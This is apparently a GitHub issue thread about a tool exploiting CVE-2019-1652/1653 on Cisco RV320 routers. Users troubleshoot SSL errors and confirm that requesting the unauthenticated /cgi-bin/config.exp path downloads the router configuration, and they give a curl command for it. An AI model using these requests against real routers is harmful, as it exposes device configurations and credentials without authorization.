0x27 / CiscoRV320Dump

CVE-2019-1652 /CVE-2019-1653 Exploits For Dumping Cisco RV320 Configurations & Debugging Data AND Remote Root Exploit!
MIT License
225 stars 71 forks source link

SSLError #6

Closed L-iot closed 5 years ago

L-iot commented 5 years ago

Hello, I started playing around with your CiscoRV320dump tool when i got the following errors in kali linux 4.18.20-2kali2 (2018-11-30) x86_64 GNU/Linux as well as in Linux kali 4.19.0-kali-amd64 #1 SMP Debian 4.19.13-lkali (2019-01-03) x86_64 GNU/Linux:

{+} Sending request to https://x.x.x.x:8433/cgi-bin/config.exp {!} Exception while sending request, printing... HTTPSConnectionPool (host='x.x.x.x' , port=8443) : Max retries exceeded with url: /cgi-bin/config.exp (Caused by SSLError ("bad Handshake: SysCallError(-1, 'Unexpected EOF')",),))

{+} Sending request to https://x.x.x.x:8433/cgi-bin/export_debug_msg.exp {!} Exception while sending request, printing... HTTPSConnectionPool (host='x.x.x.x' , port=8443) : Max retries exceeded with url: /cgi-bin/config.exp (Caused by SSLError ("bad Handshake: SysCallError(-1, 'Unexpected EOF')",),))

can you point me in the right direction to find a sollution for that error?

0x27 commented 5 years ago

Looks like the SSL server on the remote end is not working properly.

Can you try something like this? curl -vvk https://x.x.x.x:8443/cgi-bin/config.exp

L-iot commented 5 years ago

:~@#curl -vvk https://xxx.xxx.xxx.xxx/cgi-bin/config.exp *Expire in 0 ms for 6 (transfer xxxxxxxxxxxxxx)

L-iot commented 5 years ago

It seems that the error is due to the fact, that the router uses a selfsigned cert. When i manually confirm the security exception and then enter https://xxx.xxx.xxx.xxx/cgi-bin/config.exp the configuration file is dowloaded.

manual usage of the /cgi-bin/export_debug_msg.exp throws 2 different error messages , even when the first call worked.(cgi-bin/config.exp)

the errors are:

Error: The page you are trying to access is not available. Click here to go back. (which might indicate a patched firmware)

and

Critical failure. Please contact support.